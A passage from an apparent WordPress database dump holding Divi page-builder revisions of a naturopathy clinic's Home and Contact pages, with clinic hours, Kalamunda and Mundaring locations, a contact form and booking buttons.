header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-08-11 13:39:12','2021-08-11 05:39:12','',28,'https://verdenaturopathy.com.au/?p=334',0,'revision','',0),(361,1,'2021-09-14 10:34:49','2021-09-14 02:34:49','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></p>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Mundaring</span></em></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 8am-1pm</span></span></h3>\n<p><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></p>\n<h3><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Kalamunda</span></span></em></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed: 9-6pm<br /></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 2pm-7pm</span><br /><span style=\"font-family: Montserrat; color: #666666;\">Sat: 9am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Online consults available any of the above times</span></span></h3>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span></p>\n<p><span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\"> Mundaring Wellness Centre (16 Craig st, Mundaring)</span><span style=\"font-family: Montserrat; font-size: large;\"></span></p>\n<p><span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 8.15am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p> </p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-09-14 10:34:49','2021-09-14 02:34:49','',26,'https://verdenaturopathy.com.au/?p=361',0,'revision','',0),(338,1,'2021-08-11 13:49:27','2021-08-11 05:49:27','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"560px\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_contact_form captcha=\"off\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\" success_message=\"Thanks for contacting us. We will be in touch soon.\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" form_field_font=\"Montserrat||||||||\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" form_field_background_color__hover_enabled=\"on|desktop\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" hover_enabled=\"0\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\';\">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Mundaring</span></em></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 8.15am-12.45pm</span></span></h3>\n<span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span>\n<h3><span style=\"text-decoration: underline;\"><em><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666; text-decoration: underline;\">Kalamunda</span></span></em></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Tues: 2-5pm\n</span></span><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Wed: 9am-6pm</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">Thurs: 9am-7pm</span>\n<span style=\"font-family: Montserrat; color: #666666;\">Sat: 9am-1pm</span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\">(Online consults available anytime)</span></span><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat; color: #666666;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span>\n\n<span style=\"font-family: Montserrat; font-size: large;\"> Mundaring Wellness Centre (16 Craig st, Mundaring)</span><span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n<span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" 